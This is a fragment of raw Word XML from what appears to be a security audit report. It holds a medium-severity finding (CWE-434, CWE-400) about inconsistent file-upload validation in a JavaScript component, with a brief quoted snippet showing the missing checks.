                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6480126" cy="1839007"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6480126" cy="1839007"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1836" name="Shape 1836"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="505507"/>
                            <a:ext cx="6480126" cy="895350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="6480126" h="895350">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6467474" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6470001" y="0"/>
                                  <a:pt x="6472430" y="484"/>
                                  <a:pt x="6474764" y="1451"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="5034"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="890316"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6474764" y="893899"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6472430" y="894866"/>
                                  <a:pt x="6470001" y="895350"/>
                                  <a:pt x="6467474" y="895350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19050" y="895350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="16524" y="895350"/>
                                  <a:pt x="14094" y="894866"/>
                                  <a:pt x="11760" y="893899"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9426" y="892932"/>
                                  <a:pt x="7366" y="891555"/>
                                  <a:pt x="5580" y="889769"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3793" y="887983"/>
                                  <a:pt x="2417" y="885924"/>
                                  <a:pt x="1450" y="883593"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="876300"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="19050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450" y="11757"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2417" y="9413"/>
                                  <a:pt x="3793" y="7355"/>
                                  <a:pt x="5580" y="5581"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="7366" y="3783"/>
                                  <a:pt x="9426" y="2406"/>
                                  <a:pt x="11760" y="1451"/>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1940" name="Rectangle 1940"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="587607" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="001E670A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                                <w:rPr>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00C73B1A">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                                <w:t>OWASP</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1941" name="Rectangle 1941"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="441871" y="0"/>
                            <a:ext cx="1175986" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6E846088" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> A05/A06:2021 · </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1942" name="Rectangle 1942"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1326207" y="0"/>
                            <a:ext cx="684180" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0957A7FF" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                                <w:rPr>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00C73B1A">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                                <w:t>CWE-434</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1943" name="Rectangle 1943"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1840706" y="0"/>
                            <a:ext cx="87709" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2DFF4703" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">, </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1944" name="Rectangle 1944"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1906786" y="0"/>
                            <a:ext cx="684180" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="76A28892" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                                <w:rPr>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00C73B1A">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                                <w:t>CWE-400</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1945" name="Rectangle 1945"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2421285" y="0"/>
                            <a:ext cx="140274" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="40F0187A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> · </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1946" name="Rectangle 1946"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2526804" y="0"/>
                            <a:ext cx="596317" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="39E2D17E" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                                <w:rPr>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00C73B1A">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                                <w:t>Medium</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1947" name="Rectangle 1947"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="266700"/>
                            <a:ext cx="3246870" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7E5DE868" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Four upload paths disagreed about validation. </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1948" name="Shape 1948"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2438400" y="248332"/>
                            <a:ext cx="1104900" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1104900" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1095375" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1098005" y="0"/>
                                  <a:pt x="1100250" y="930"/>
                                  <a:pt x="1102110" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1103970" y="4651"/>
                                  <a:pt x="1104900" y="6896"/>
                                  <a:pt x="1104900" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1104900" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1104900" y="135979"/>
                                  <a:pt x="1103970" y="138224"/>
                                  <a:pt x="1102110" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1100250" y="141945"/>
                                  <a:pt x="1098005" y="142875"/>
                                  <a:pt x="109537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49" name="Rectangle 1949"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2468314" y="271983"/>
                            <a:ext cx="1395380" cy="140110"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="56850091" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>GrnAdjust.jsx:1223</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1950" name="Rectangle 1950"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3544490" y="266700"/>
                            <a:ext cx="1964986" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="391DD1BA" w14:textId="67030DAE" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> was the worst this is the </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1951" name="Rectangle 1951"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5022056" y="266700"/>
                            <a:ext cx="640481" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4FAF14D5" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:i/>
                                </w:rPr>
                                <w:t>complete</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1952" name="Rectangle 1952"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5503664" y="266700"/>
                            <a:ext cx="754626" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5EE56E99" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> validation:</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1953" name="Rectangle 1953"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="660524"/>
                            <a:ext cx="2245532" cy="130922"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="40E23D29" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">const file = </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>e.target</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>.</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>files</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0];</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1954" name="Rectangle 1954"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="831974"/>
                            <a:ext cx="3694261" cy="130922"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3D65B4DE" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">if </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>(!file</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">) </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">return;   </w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">               // &lt;- all of it</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1955" name="Rectangle 1955"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1003424"/>
                            <a:ext cx="217310" cy="130922"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="69550F9E"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1956" name="Rectangle 1956"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1174874"/>
                            <a:ext cx="3766699" cy="130922"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="14B3D9AA" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">const workbook = </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>XLSX.read</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">(data, </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>{ type</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>: "array</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w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1957" name="Rectangle 1957"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1543050"/>
                            <a:ext cx="315847" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="14AD2B36" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">The </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1958" name="Shape 1958"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="238125" y="1524682"/>
                            <a:ext cx="1447800" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1447800" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1438275" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1440905" y="0"/>
                                  <a:pt x="1443150" y="930"/>
                                  <a:pt x="1445010" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1446870" y="4651"/>
                                  <a:pt x="1447800" y="6896"/>
                                  <a:pt x="1447800" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1447800" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1447800" y="135979"/>
                                  <a:pt x="1446870" y="138224"/>
                                  <a:pt x="1445010" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1443150" y="141945"/>
                                  <a:pt x="1440905" y="142875"/>
                                  <a:pt x="1438275" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>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59" name="Rectangle 1959"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="264468" y="1548333"/>
                            <a:ext cx="1860507" cy="140110"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
